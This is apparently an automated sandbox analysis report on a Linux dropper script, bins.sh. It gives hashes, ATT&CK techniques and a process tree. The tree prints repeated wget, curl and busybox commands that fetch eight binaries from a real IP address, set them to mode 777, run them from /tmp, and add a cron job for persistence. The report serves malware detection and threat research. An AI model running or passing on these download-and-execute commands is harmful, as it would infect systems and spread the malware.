595e085ffa26fa28aa8239b3b3933d07640a8515849c28be5d4ec7dcede29171

Analysis

max time kernel
6s
max time network
12s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
01-11-2024 11:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

2fe36714c5313a7d81854b3d14c21787
SHA1

ed011c90831d33d3c8e8c3ae2581979532b0cf45
SHA256

595e085ffa26fa28aa8239b3b3933d07640a8515849c28be5d4ec7dcede29171
SHA512

99f2b2cf18a88d5d2f6fa5b93ff0a04ae5a72d5a36555118c0ac829b16414bd0524d03b3230fa7fc9a151f00e0f4c6f0a6302143dd94c0c1d0fb272882c29a9e
SSDEEP

96:TRLVZ9tLlxg7buyLNe44ps1FjSlxg7bYlYXNxos644psNFW04XVZ9C4V:lLVZ9Jlxg7buyLNTUlxg7bT9GZ9B

Score

7^/10

defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmod

pid process

1514 chmod
1531 chmod
1538 chmod
1545 chmod
1552 chmod
1559 chmod
1565 chmod
1572 chmod

pid	process
1514	chmod
1531	chmod
1538	chmod
1545	chmod
1552	chmod
1559	chmod
1565	chmod
1572	chmod

Executes dropped EXE 8 IoCs

Processes:

CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEym554PiqKXN4t5qHc8RkLZpFSuMUU5gGUPG5kOid96QqAeCGcEf4R4MFaSOGokDqpUfQgmtqsvRnimUsyzC7nmAcQlAbOxvcycWQY8Fnm3xsvqJ9BAfLZ3pAWDzb5l4w5a9amClksHtKbKhJBvJjwZsvQWDfcCDtA8WeZYRJhPl8i496Vlm5dr9modPTfhqUw2cujR4668EABM40c94M6R0kdn5dkiOBesKBlKYRwKt0Je5

ioc	pid	process
/tmp/CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy	1515	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
/tmp/m554PiqKXN4t5qHc8RkLZpFSuMUU5gGUPG	1532	m554PiqKXN4t5qHc8RkLZpFSuMUU5gGUPG
/tmp/5kOid96QqAeCGcEf4R4MFaSOGokDqpUfQg	1539	5kOid96QqAeCGcEf4R4MFaSOGokDqpUfQg
/tmp/mtqsvRnimUsyzC7nmAcQlAbOxvcycWQY8F	1546	mtqsvRnimUsyzC7nmAcQlAbOxvcycWQY8F
/tmp/nm3xsvqJ9BAfLZ3pAWDzb5l4w5a9amClks	1553	nm3xsvqJ9BAfLZ3pAWDzb5l4w5a9amClks
/tmp/HtKbKhJBvJjwZsvQWDfcCDtA8WeZYRJhPl	1560	HtKbKhJBvJjwZsvQWDfcCDtA8WeZYRJhPl
/tmp/8i496Vlm5dr9modPTfhqUw2cujR4668EAB	1566	8i496Vlm5dr9modPTfhqUw2cujR4668EAB
/tmp/M40c94M6R0kdn5dkiOBesKBlKYRwKt0Je5	1573	M40c94M6R0kdn5dkiOBesKBlKYRwKt0Je5

Renames itself 1 IoCs

Processes:

CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy

pid process

1516 CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
execution persistence privilege_escalatio

Cron
T1053.003

Processes:

crontab

description ioc process

File opened for modification /var/spool/cron/crontabs/tmp.SE3bvY crontab
Enumerates running processes
Discovers information about currently running processes on the system

pid	process
1516	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.SE3bvY	crontab

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy

description	ioc	process
File opened for reading	/proc/165/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/1141/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/1177/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/172/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/432/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/1133/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/1157/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/1240/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/81/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/177/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/441/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/1174/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/2/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/29/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/83/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/1528/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/34/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/84/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/167/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/1064/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/1074/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/1336/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/1556/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/14/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/20/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/166/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/419/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/427/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/555/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/731/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/1125/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/79/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/115/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/179/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/514/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/559/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/708/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/1293/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/1535/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/18/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/515/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/686/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/960/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/1068/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/1199/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/1480/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/1504/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/24/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/176/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/465/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/474/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/1161/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/1166/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/19/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/418/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/583/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/688/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/1192/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/1569/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/457/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/612/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/12/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/163/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
File opened for reading	/proc/277/cmdline	CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy

Writes file to tmp directory 17 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgetcurlbusyboxcurlcurlcurlbusyboxbusyboxbusyboxbusyboxbusyboxcurlbusyboxcurlcurlcurlbusybox

description	ioc	process
File opened for modification	/tmp/CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy	wget
File opened for modification	/tmp/5kOid96QqAeCGcEf4R4MFaSOGokDqpUfQg	curl
File opened for modification	/tmp/mtqsvRnimUsyzC7nmAcQlAbOxvcycWQY8F	busybox
File opened for modification	/tmp/HtKbKhJBvJjwZsvQWDfcCDtA8WeZYRJhPl	curl
File opened for modification	/tmp/M40c94M6R0kdn5dkiOBesKBlKYRwKt0Je5	curl
File opened for modification	/tmp/CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy	curl
File opened for modification	/tmp/CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy	busybox
File opened for modification	/tmp/5kOid96QqAeCGcEf4R4MFaSOGokDqpUfQg	busybox
File opened for modification	/tmp/nm3xsvqJ9BAfLZ3pAWDzb5l4w5a9amClks	busybox
File opened for modification	/tmp/8i496Vlm5dr9modPTfhqUw2cujR4668EAB	busybox
File opened for modification	/tmp/M40c94M6R0kdn5dkiOBesKBlKYRwKt0Je5	busybox
File opened for modification	/tmp/m554PiqKXN4t5qHc8RkLZpFSuMUU5gGUPG	curl
File opened for modification	/tmp/m554PiqKXN4t5qHc8RkLZpFSuMUU5gGUPG	busybox
File opened for modification	/tmp/mtqsvRnimUsyzC7nmAcQlAbOxvcycWQY8F	curl
File opened for modification	/tmp/nm3xsvqJ9BAfLZ3pAWDzb5l4w5a9amClks	curl
File opened for modification	/tmp/8i496Vlm5dr9modPTfhqUw2cujR4668EAB	curl
File opened for modification	/tmp/HtKbKhJBvJjwZsvQWDfcCDtA8WeZYRJhPl	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:1501

/bin/rm
/bin/rm bins.sh
2⤵
PID:1502

/usr/bin/wget
wget http://87.120.84.230/bins/CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
2⤵
- Writes file to tmp directory
PID:1503

/usr/bin/curl
curl -O http://87.120.84.230/bins/CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
2⤵
- Writes file to tmp directory
PID:1507

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
2⤵
- Writes file to tmp directory
PID:1508

/bin/chmod
chmod 777 CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
2⤵
- File and Directory Permissions Modification
PID:1514

/tmp/CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
./CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:1515

/bin/sh
sh -c "crontab -l"
3⤵
PID:1517

/usr/bin/crontab
crontab -l
4⤵
PID:1518

/bin/sh
sh -c "crontab -"
3⤵
PID:1519

/usr/bin/crontab
crontab -
4⤵
- Creates/modifies Cron job
PID:1520

/bin/rm
rm CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy
2⤵
PID:1525

/usr/bin/wget
wget http://87.120.84.230/bins/m554PiqKXN4t5qHc8RkLZpFSuMUU5gGUPG
2⤵
PID:1528

/usr/bin/curl
curl -O http://87.120.84.230/bins/m554PiqKXN4t5qHc8RkLZpFSuMUU5gGUPG
2⤵
- Writes file to tmp directory
PID:1529

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/m554PiqKXN4t5qHc8RkLZpFSuMUU5gGUPG
2⤵
- Writes file to tmp directory
PID:1530

/bin/chmod
chmod 777 m554PiqKXN4t5qHc8RkLZpFSuMUU5gGUPG
2⤵
- File and Directory Permissions Modification
PID:1531

/tmp/m554PiqKXN4t5qHc8RkLZpFSuMUU5gGUPG
./m554PiqKXN4t5qHc8RkLZpFSuMUU5gGUPG
2⤵
- Executes dropped EXE
PID:1532

/bin/rm
rm m554PiqKXN4t5qHc8RkLZpFSuMUU5gGUPG
2⤵
PID:1534

/usr/bin/wget
wget http://87.120.84.230/bins/5kOid96QqAeCGcEf4R4MFaSOGokDqpUfQg
2⤵
PID:1535

/usr/bin/curl
curl -O http://87.120.84.230/bins/5kOid96QqAeCGcEf4R4MFaSOGokDqpUfQg
2⤵
- Writes file to tmp directory
PID:1536

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/5kOid96QqAeCGcEf4R4MFaSOGokDqpUfQg
2⤵
- Writes file to tmp directory
PID:1537

/bin/chmod
chmod 777 5kOid96QqAeCGcEf4R4MFaSOGokDqpUfQg
2⤵
- File and Directory Permissions Modification
PID:1538

/tmp/5kOid96QqAeCGcEf4R4MFaSOGokDqpUfQg
./5kOid96QqAeCGcEf4R4MFaSOGokDqpUfQg
2⤵
- Executes dropped EXE
PID:1539

/bin/rm
rm 5kOid96QqAeCGcEf4R4MFaSOGokDqpUfQg
2⤵
PID:1541

/usr/bin/wget
wget http://87.120.84.230/bins/mtqsvRnimUsyzC7nmAcQlAbOxvcycWQY8F
2⤵
PID:1542

/usr/bin/curl
curl -O http://87.120.84.230/bins/mtqsvRnimUsyzC7nmAcQlAbOxvcycWQY8F
2⤵
- Writes file to tmp directory
PID:1543

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/mtqsvRnimUsyzC7nmAcQlAbOxvcycWQY8F
2⤵
- Writes file to tmp directory
PID:1544

/bin/chmod
chmod 777 mtqsvRnimUsyzC7nmAcQlAbOxvcycWQY8F
2⤵
- File and Directory Permissions Modification
PID:1545

/tmp/mtqsvRnimUsyzC7nmAcQlAbOxvcycWQY8F
./mtqsvRnimUsyzC7nmAcQlAbOxvcycWQY8F
2⤵
- Executes dropped EXE
PID:1546

/bin/rm
rm mtqsvRnimUsyzC7nmAcQlAbOxvcycWQY8F
2⤵
PID:1548

/usr/bin/wget
wget http://87.120.84.230/bins/nm3xsvqJ9BAfLZ3pAWDzb5l4w5a9amClks
2⤵
PID:1549

/usr/bin/curl
curl -O http://87.120.84.230/bins/nm3xsvqJ9BAfLZ3pAWDzb5l4w5a9amClks
2⤵
- Writes file to tmp directory
PID:1550

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/nm3xsvqJ9BAfLZ3pAWDzb5l4w5a9amClks
2⤵
- Writes file to tmp directory
PID:1551

/bin/chmod
chmod 777 nm3xsvqJ9BAfLZ3pAWDzb5l4w5a9amClks
2⤵
- File and Directory Permissions Modification
PID:1552

/tmp/nm3xsvqJ9BAfLZ3pAWDzb5l4w5a9amClks
./nm3xsvqJ9BAfLZ3pAWDzb5l4w5a9amClks
2⤵
- Executes dropped EXE
PID:1553

/bin/rm
rm nm3xsvqJ9BAfLZ3pAWDzb5l4w5a9amClks
2⤵
PID:1555

/usr/bin/wget
wget http://87.120.84.230/bins/HtKbKhJBvJjwZsvQWDfcCDtA8WeZYRJhPl
2⤵
PID:1556

/usr/bin/curl
curl -O http://87.120.84.230/bins/HtKbKhJBvJjwZsvQWDfcCDtA8WeZYRJhPl
2⤵
- Writes file to tmp directory
PID:1557

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/HtKbKhJBvJjwZsvQWDfcCDtA8WeZYRJhPl
2⤵
- Writes file to tmp directory
PID:1558

/bin/chmod
chmod 777 HtKbKhJBvJjwZsvQWDfcCDtA8WeZYRJhPl
2⤵
- File and Directory Permissions Modification
PID:1559

/tmp/HtKbKhJBvJjwZsvQWDfcCDtA8WeZYRJhPl
./HtKbKhJBvJjwZsvQWDfcCDtA8WeZYRJhPl
2⤵
- Executes dropped EXE
PID:1560

/bin/rm
rm HtKbKhJBvJjwZsvQWDfcCDtA8WeZYRJhPl
2⤵
PID:1561

/usr/bin/wget
wget http://87.120.84.230/bins/8i496Vlm5dr9modPTfhqUw2cujR4668EAB
2⤵
PID:1562

/usr/bin/curl
curl -O http://87.120.84.230/bins/8i496Vlm5dr9modPTfhqUw2cujR4668EAB
2⤵
- Writes file to tmp directory
PID:1563

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/8i496Vlm5dr9modPTfhqUw2cujR4668EAB
2⤵
- Writes file to tmp directory
PID:1564

/bin/chmod
chmod 777 8i496Vlm5dr9modPTfhqUw2cujR4668EAB
2⤵
- File and Directory Permissions Modification
PID:1565

/tmp/8i496Vlm5dr9modPTfhqUw2cujR4668EAB
./8i496Vlm5dr9modPTfhqUw2cujR4668EAB
2⤵
- Executes dropped EXE
PID:1566

/bin/rm
rm 8i496Vlm5dr9modPTfhqUw2cujR4668EAB
2⤵
PID:1568

/usr/bin/wget
wget http://87.120.84.230/bins/M40c94M6R0kdn5dkiOBesKBlKYRwKt0Je5
2⤵
PID:1569

/usr/bin/curl
curl -O http://87.120.84.230/bins/M40c94M6R0kdn5dkiOBesKBlKYRwKt0Je5
2⤵
- Writes file to tmp directory
PID:1570

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/M40c94M6R0kdn5dkiOBesKBlKYRwKt0Je5
2⤵
- Writes file to tmp directory
PID:1571

/bin/chmod
chmod 777 M40c94M6R0kdn5dkiOBesKBlKYRwKt0Je5
2⤵
- File and Directory Permissions Modification
PID:1572

/tmp/M40c94M6R0kdn5dkiOBesKBlKYRwKt0Je5
./M40c94M6R0kdn5dkiOBesKBlKYRwKt0Je5
2⤵
- Executes dropped EXE
PID:1573

/bin/rm
rm M40c94M6R0kdn5dkiOBesKBlKYRwKt0Je5
2⤵
PID:1575

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/5kOid96QqAeCGcEf4R4MFaSOGokDqpUfQg

Filesize
12KB

MD5
9ad7a8dd9feb112db51e7f6d6fb1141a

SHA1
78c5f8e89b3f39e9d3e6ad19fdb2ec9f498f49c9

SHA256
130861180496d99ab506462558023721a9a6d51a6d60af485b6558ba0e61bd7f

SHA512
769f48c3da6c3b77a2b7b83b68f4e8f9d744234f51c0cb0c527a3928cd1a1cebf3cb0bd339235be84966abc44607009e5bb640034a72c32099a89226526ef0e6

Download Submit
/tmp/8i496Vlm5dr9modPTfhqUw2cujR4668EAB

Filesize
12KB

MD5
716933d532f0e4053b4946e8ea31b75b

SHA1
3353e8171bfb629706db6cbd4da8f5ec6a721734

SHA256
a5aa6973f3bf1e4662d956648d3901b1137b192c936591a4a30fd1e6ff243a3c

SHA512
396e10e708cae8219dd539d3a44eb84069a705047c3cdc6491842c5dcf03c4a54aba1477e540ffd148245dad98febbef7df6fe90c7f43d29bc5568c691ba6ac5

Download Submit
/tmp/CIMRaEGlHBdybj7bIqd2y7XWneRJS1GaEy

Filesize
84KB

MD5
64ece99ca4ab1c1405f5a3335d64a960

SHA1
b7395f2320a5bdadb78943b268708965cdbd1d74

SHA256
aaf14287d7a971d4541527262e85e5930bbb7f506cff4808d712843be9f05dae

SHA512
bc169075e50ceffd0ce0cc90513bc2f0d8696c01d4132609e31c782ea6c0a755505891e2e23676dd63c3dd00bf97599a9a7e6230e8c3f5166202f5b9be606d41

Download Submit
/tmp/HtKbKhJBvJjwZsvQWDfcCDtA8WeZYRJhPl

Filesize
12KB

MD5
2df7fd5fe62a82ab28269db7322914c2

SHA1
e78ff67c942997c900f7f1689f25b463da77c498

SHA256
a8b66c796bc85f7e64f13260cba2521cb0e6941900f4813b9e137298eab2f933

SHA512
06bd800ebbab67da07b41fbf00d1fdfc8d8fd33484ae1f45118814d6ade8855c155ad806fd26c0821f39e6e5eb78f4b73e16771beab46c66c83344d8f73b4102

Download Submit
/tmp/M40c94M6R0kdn5dkiOBesKBlKYRwKt0Je5

Filesize
12KB

MD5
ff9fac8dd015aeb94ca48ec7d0f40c39

SHA1
6340349e189c8f8590e17a36e4adb5c688328db1

SHA256
916eb844c029deb6afdc6b454158c22f7be2a6ee1f68af74f81b9b6b7105210a

SHA512
029cd769a99598d2e8670f568264127029ee7c8f7d3a6a76493b4f30c978127f2725e1f510b89afe15552c67f6386eeb353985417a9e630df8b3c0d891cf81f0

Download Submit
/tmp/m554PiqKXN4t5qHc8RkLZpFSuMUU5gGUPG

Filesize
12KB

MD5
626ba6115006a5b74d274720d56646b4

SHA1
d712c67682303432c5fe0bebcb739221cee91889

SHA256
d2369e19ed1a6768d755d1655488ff4c5b8518449388c97bef4ddec25d29dd4e

SHA512
e7f6663960beee55a57e4f747c74c237fc5e8cb9fa09d2bc02dfa6e1d7d7d92a19b5a22c73d0b3ade1f4f8ca481594badaa0647caafeaf2108f78a87eacb7d2e

Download Submit
/tmp/mtqsvRnimUsyzC7nmAcQlAbOxvcycWQY8F

Filesize
12KB

MD5
2a30b665587c74722d5da5e1c228c67d

SHA1
74d72e8966b19aa6e191694b4500991e02002b3a

SHA256
7e4265f18f27bfad6c3a25d1bc58b7879a05388b9f2e4e8738bb53d738b432ec

SHA512
5d39fbf98c52e43149815af5d9cf9d3e9cb593ea39e70a0a561b7f552db1aaa24cb7d4447ac6d141c5590e7de528be47ffb7f3d1f29b3216a748f39402f3667d

Download Submit
/tmp/nm3xsvqJ9BAfLZ3pAWDzb5l4w5a9amClks

Filesize
12KB

MD5
0c80988acfd42b459053dbb190be5311

SHA1
b6824f45ecec27cb7b2f051620fcf2488519f939

SHA256
56e1a3cf16c47a7ac82590ef74e3ef653eb8baa1d90c11caf2a373b98520695d

SHA512
5594178a76ab6a1d550fccf4ff9c265de700bf89428fbca26039114437da6a224a0d29f0287ba02a666fae890c241392ce5f8fa34b4101c6a8c88695d7be90fe

Download Submit
/var/spool/cron/crontabs/tmp.SE3bvY

Filesize
210B

MD5
41d636901a7a257898e9d3d4385d364e

SHA1
89ad9637910a4f92d33734db78be06f6b6463435

SHA256
ffe83ce71903e84f1cd5d3d9d1bd418a7c5f3ac1d7932fe09b328100efb8d6da

SHA512
9d58d294c64189541cda5ee940b24d853e1d32df07e4c55c21b72795b45d2aa1e902c85f784043e6bda3405aa53564df25af96d575fd944d799d0557a0cd92b4

Download Submit